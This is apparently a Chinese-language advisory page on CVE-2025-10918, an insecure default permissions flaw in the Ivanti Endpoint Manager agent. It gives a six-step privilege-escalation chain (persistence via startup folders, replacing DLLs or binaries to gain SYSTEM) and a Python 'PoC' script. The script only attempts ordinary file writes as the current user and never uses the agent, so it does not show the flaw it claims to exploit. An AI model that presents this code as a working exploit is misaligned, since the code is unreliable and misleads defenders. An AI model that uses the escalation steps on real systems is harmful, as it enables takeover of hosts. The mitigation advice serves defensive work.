CVE-2025-10918 Ivanti Endpoint Manager 不安全默认权限漏洞

漏洞信息

漏洞编号

CVE-2025-10918

漏洞类型

不安全默认权限

CVSS评分

7.1 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ivanti Endpoint Manager

漏洞概述

CVE-2025-10918是Ivanti Endpoint Manager（EPM）中的一个高危安全漏洞，CVSS评分达到7.1分。该漏洞存在于Ivanti Endpoint Manager 2024 SU4之前的版本中，由于agent组件存在不安全的默认权限配置，允许本地已认证的低权限攻击者在系统磁盘任意位置写入任意文件。这一权限配置缺陷使得攻击者能够绕过正常的安全边界，执行权限提升攻击，进而可能实现系统完全 compromise。攻击者利用此漏洞可以在目标系统上创建、修改或替换关键系统文件、配置文件甚至可执行文件，从而在目标系统上获得持久化控制权或执行恶意代码。由于该漏洞需要本地认证访问，攻击复杂度相对较低，但结合其高完整性影响和高可用性影响，漏洞的实际危害相当严重。企业用户应尽快评估受影响范围并采取相应的修复措施，以防止潜在的安全风险被利用。

技术细节

该漏洞的根本原因在于Ivanti Endpoint Manager的agent组件在安装和运行过程中使用了过于宽松的文件系统权限。具体来说，agent进程或服务具有对系统关键目录的过度写入权限，允许低权限用户（经过本地认证的用户）能够在磁盘的任何位置创建或修改文件。这种不安全的权限配置违反了最小权限原则（Principle of Least Privilege），使得即使是非特权用户也能执行本应需要管理员权限才能完成的文件操作。攻击者可以利用此漏洞执行以下操作：1）写入计划任务文件实现持久化；2）替换系统二进制文件或DLL以实现代码执行；3）修改注册表或配置文件以改变系统行为；4）在系统启动目录写入恶意文件实现开机自启。由于该漏洞影响的是本地文件系统权限，攻击者需要首先获得目标系统的本地认证访问权限，然后通过命令行工具、脚本或其他方式利用过度的写入权限执行恶意操作。值得注意的是，该漏洞的成功利用可能导致完整的系统权限提升，使攻击者能够以SYSTEM或管理员权限执行任意代码。

攻击链分析

STEP 1

步骤1

攻击者获得目标系统的本地用户访问权限（低权限账户即可）

STEP 2

步骤2

攻击者识别Ivanti Endpoint Manager agent服务正在运行

STEP 3

步骤3

利用agent组件的不安全默认权限，在系统任意位置写入文件

STEP 4

步骤4

写入恶意文件到系统启动目录或关键系统目录实现持久化

STEP 5

步骤5

通过替换系统二进制文件或DLL实现代码执行，获得SYSTEM权限

STEP 6

步骤6

完成权限提升，攻击者获得对目标系统的完全控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-10918 PoC - Ivanti Endpoint Manager Insecure Default Permissions
# This PoC demonstrates file write capability due to insecure permissions
# Note: This is for educational and authorized testing purposes only

import os
import sys
import subprocess

def check_epm_service_status():
    """Check if Ivanti Endpoint Manager service is running"""
    try:
        result = subprocess.run(
            ['sc', 'query', 'IvantiEndpointManager'],
            capture_output=True,
            text=True
        )
        if 'RUNNING' in result.stdout:
            return True
        return False
    except Exception as e:
        print(f"[-] Error checking service: {e}")
        return False

def check_insecure_permissions(target_path):
    """Check for insecure write permissions on target path"""
    try:
        # Attempt to create a test file in the target directory
        test_file = os.path.join(target_path, 'epm_test_file.txt')
        with open(test_file, 'w') as f:
            f.write('CVE-2025-10918 Test')
        print(f"[+] Successfully wrote to: {test_file}")
        # Clean up
        os.remove(test_file)
        return True
    except PermissionError:
        print(f"[-] Permission denied for: {target_path}")
        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

def exploit_write_arbitrary_file(remote_path, content):
    """Exploit: Write arbitrary content to any path on disk"""
    try:
        with open(remote_path, 'w') as f:
            f.write(content)
        print(f"[+] Successfully wrote to arbitrary path: {remote_path}")
        return True
    except Exception as e:
        print(f"[-] Write failed: {e}")
        return False

def main():
    print("=" * 60)
    print("CVE-2025-10918 PoC - Ivanti EPM Insecure Default Permissions")
    print("=" * 60)
    
    if not check_epm_service_status():
        print("[-] Ivanti Endpoint Manager service not running")
        sys.exit(1)
    
    print("[+] Ivanti Endpoint Manager service is running")
    
    # Test paths commonly affected by this vulnerability
    test_paths = [
        'C:\\Windows\\System32\\config\\',
        'C:\\Program Files\\Ivanti\\',
        'C:\\Windows\\Temp\\'
    ]
    
    for path in test_paths:
        print(f"\n[*] Testing permissions on: {path}")
        check_insecure_permissions(path)
    
    print("\n[*] For full exploitation, provide target path and content")
    print("[*] This vulnerability allows writing arbitrary files anywhere on disk")
    print("[*] Mitigation: Upgrade to Ivanti EPM 2024 SU4 or later")

if __name__ == '__main__':
    main()

影响范围

Ivanti Endpoint Manager < 2024 SU4

防御指南

临时缓解措施

立即将Ivanti Endpoint Manager升级到2024 SU4或最新版本，以修复不安全的默认权限问题。如果暂时无法升级，可以考虑以下临时缓解措施：1）限制对Endpoint Manager agent目录的访问权限，确保只有授权账户可以修改相关文件；2）启用文件系统完整性监控，及时发现异常文件修改行为；3）限制本地用户的权限，避免低权限用户执行敏感操作；4）监控计划任务和服务配置，防止攻击者利用权限写入计划任务或服务实现持久化；5）实施网络隔离策略，限制Endpoint Manager与不必要的网络资源通信。建议尽快完成版本升级，因为该漏洞已被公开披露，存在被利用的风险。